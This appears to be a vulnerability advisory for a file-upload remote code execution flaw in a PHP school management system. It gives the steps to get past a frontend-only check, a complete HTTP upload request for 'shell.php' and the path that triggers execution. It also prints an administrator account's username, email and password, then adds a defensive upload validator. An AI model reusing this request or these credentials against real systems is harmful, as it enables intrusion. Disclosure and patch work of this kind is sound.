Key vulnerability information obtained from the webpage screenshot:

### Vulnerability Overview

**Name**: Advanced School Management System v1.0 Remote Code Execution (RCE)

### Vulnerability Details

- **Affected Version**: v1.0
- **Vendor**: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/
- **Vulnerability Type**: Remote Code Execution (RCE)
- **Vulnerable File**: `ip/school/view/all_teacher.php`
- **Vulnerable Function**: "edit" function

### Vulnerability Description

- The file upload point of the "edit" function in the TEACHER module of the backend management system has an arbitrary file upload vulnerability that leads to RCE: the file type is only checked on the frontend, so the server stores whatever file name and content it receives.
- The vulnerability can be exploited by changing the file extension (e.g., renaming `shell.php` to `shell.png`) to bypass the frontend check, then intercepting the request with Burp Suite to restore the original `.php` extension, so that `shell.php` is uploaded successfully.

### Vulnerability Verification

- **Upload Request Example**:

```http
POST /school/index.php HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/school/view/all_teacher.php
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12765172874523
Content-Length: 1148

-----------------------------12765172874523
Content-Disposition: form-data; name="full_name"

Teacher 6
-----------------------------12765172874523
Content-Disposition: form-data; name="i_name"

Teacher 6
-----------------------------12765172874523
Content-Disposition: form-data; name="address"

School
-----------------------------12765172874523
Content-Disposition: form-data; name="gender"

Male
-----------------------------12765172874523
Content-Disposition: form-data; name="phone"

666-666-6666
-----------------------------12765172874523
Content-Disposition: form-data; name="email"

t6@gmail.com
-----------------------------12765172874523
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg

JFIF
-----------------------------12765172874523
Content-Disposition: form-data; name="c_page"

1
-----------------------------12765172874523
Content-Disposition: form-data; name="id"

15
-----------------------------12765172874523
Content-Disposition: form-data; name="do"

update_teacher
-----------------------------12765172874523--
```

- **Uploaded File Path**: `\school\uploads`
- **Verification Execution**: Accessing `http://192.168.1.19/school/uploads/2022063025545.php` confirms that the uploaded code was executed.

### Additional Information

- **Super Administrator Account**: Username: `superheroes`, Email: `suarez081119@gmail.com`, Password: `12345`
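As an added example (not code from the Advanced School Management System or its vendor), the following server-side validator for the `fileToUpload` field rejects the request above on three independent grounds: the content is not a real image, the client extension does not match the detected type, and the stored name is generated rather than taken from the client. The function name, the `update_teacher` handler context and the upload directory path are assumptions.

```php
<?php
// Hypothetical helper for a teacher-photo upload; not the project's own code.
// Returns the stored file name on success, or null when the upload is rejected.
function validate_and_store_image(array $file, string $uploadDir): ?string
{
    // Reject anything PHP itself flagged (partial upload, size limit, no file).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Only handle a temp path that really came from this request's upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Allowlist keyed by the MIME type detected from the file's bytes,
    // never from the client-supplied Content-Type header or the filename.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // The client extension must agree with the detected type, so a restored
    // ".php" name or a "shell.png" that is not really a PNG is rejected here.
    $clientExt = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $extOk = ($clientExt === $allowed[$mime]) || ($clientExt === 'jpeg' && $mime === 'image/jpeg');
    if (!$extOk) {
        return null;
    }
    // Require that the bytes actually decode as an image; a bare "JFIF"
    // string like the one in the request above does not.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Never reuse the client's filename: a random name plus the allowlisted
    // extension means no ".php" can ever reach disk through this path.
    $newName = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest    = rtrim($uploadDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // stored image must not be executable
    return $newName;
}

// Assumed call site inside the update_teacher handler:
// $stored = validate_and_store_image($_FILES['fileToUpload'], '/var/app/uploads');
// if ($stored === null) { http_response_code(400); exit('invalid image'); }
```

The upload directory should additionally be served with script execution disabled (for example, by not routing files under it to the PHP interpreter), so that a file which slips past validation still cannot be executed as in the `uploads/2022063025545.php` verification step.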